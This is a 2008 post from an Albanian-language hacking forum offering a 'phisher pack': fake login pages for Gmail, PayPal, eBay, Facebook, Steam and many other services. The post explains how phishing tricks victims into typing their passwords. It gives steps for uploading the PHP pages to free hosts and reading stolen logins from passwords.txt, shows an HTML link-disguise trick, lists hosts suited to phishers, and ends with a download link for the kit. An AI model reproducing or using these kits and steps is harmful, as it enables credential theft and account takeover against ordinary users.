ForumForum  PortailPortail  PytësoriPytësori  KërkoKërko  Lista AnëtarëveLista Anëtarëve  Grupet e AnëtarëveGrupet e Anëtarëve  RegjistrohuRegjistrohu  identifikimiidentifikimi  

Share | 
 

 Phisher pack

Shko poshtë 
AutoriMesazh
CrackerArianiNumri i postimeve : 57
Join date : 17/10/2008

MesazhTitulli: Phisher pack   Fri Oct 17, 2008 7:58 pm

AIM
Astatalk
Facebook
Friendster
Gaia Gold
Gmail
Habbo
IMVU
Phiser Maker (special)
Photobucket
Steam
Warez-bb
XboxLive

tek e dyta:

AIM
eBay
FaceBook
Gmail
Hi5
MySpace
PayPal
PhotoBucket
Rapidshare.com
Runescape
YahooMail

tek e treta:

AOL.com - AIM

d2jsp

DailyMotion.com

eBay.com

EverQuest Forum

FaceBook.com

FileFront.com

Gmail.com

Gmail.de

Habbo.de

Habbohotel.com

ICQ.com

Itunes

Megaupload.com

MMOCheats

Myspace

Nexon.net

OGame.de

Oxedion

Packstation

PayPal.com

PhotoBucket.com

Plesk

RapidShare.com

RapidShare.de

***********

siteworld.de

Skype.com

Steam Phishing Site

Strato

Usenext

VanGuard

Yahoo.com

YouTube.com

-----Cfar esht pra phisher----
Esht nje web i resjshme i cili eshte ber te duket si webi origjinal per me e bo diken budall qe aj me i shkrujt informacionet te logiratet dmth me username dhe password dhe me tardh ty ne email.

----Si me i perdor ------

Kerkoni nje web host i cili permban php
I bojm upload krejt fajlat tek web hostingu jon.
Pra per me i mar passat shkojm sajtijon.freehostname.com/passwords.txt ose cfar do emri e keni fajlin.

---Si me e i mshef linkat neper foruma---

nese don me postu ku html esht e lejume ather:
<a href="http://yourphisherlink.com">http://yourreallink.com</a>

---Free Hosting per phishers---

* 110mb - http://110mb.com
* Ripway - http://***********
* SuperFreeHost - http://superfreehost.info
* Freehostia - http://freehostia.com
* Funpic - http://funpic.de (How to remove ads?)
* Funpic - http://funpic.org (How to remove ads?)
* Freeweb7 - http://freeweb7.com
* t35 - http://t35.com
* Awardspace - http://awardspace.com
* PHPNet - http://phpnet.us
* Free Web Hosting Pro - http://freewebhostingpro.com
* ProHosts - http://prohosts.org
* AtSpace - http://atspace.com
* ByetHost - http://byethost.com/
* 000webhost - http://000webhost.com/---Free Domain List---

Download:


Code:

rapidshare.com/files/15088774...B_s__Curse.rar
Mbrapsht në krye Shko poshtë
Shiko profilin e anëtarit
 
Phisher pack
Mbrapsht në krye 
Faqja 1 e 1

Drejtat e ktij Forumit:Ju nuk mund ti përgjigjeni temave të këtij forumi
 :: (....::::ASG-Crew Panelli i Kontrollit::::....) :: Hacking & Security-
Kërce tek: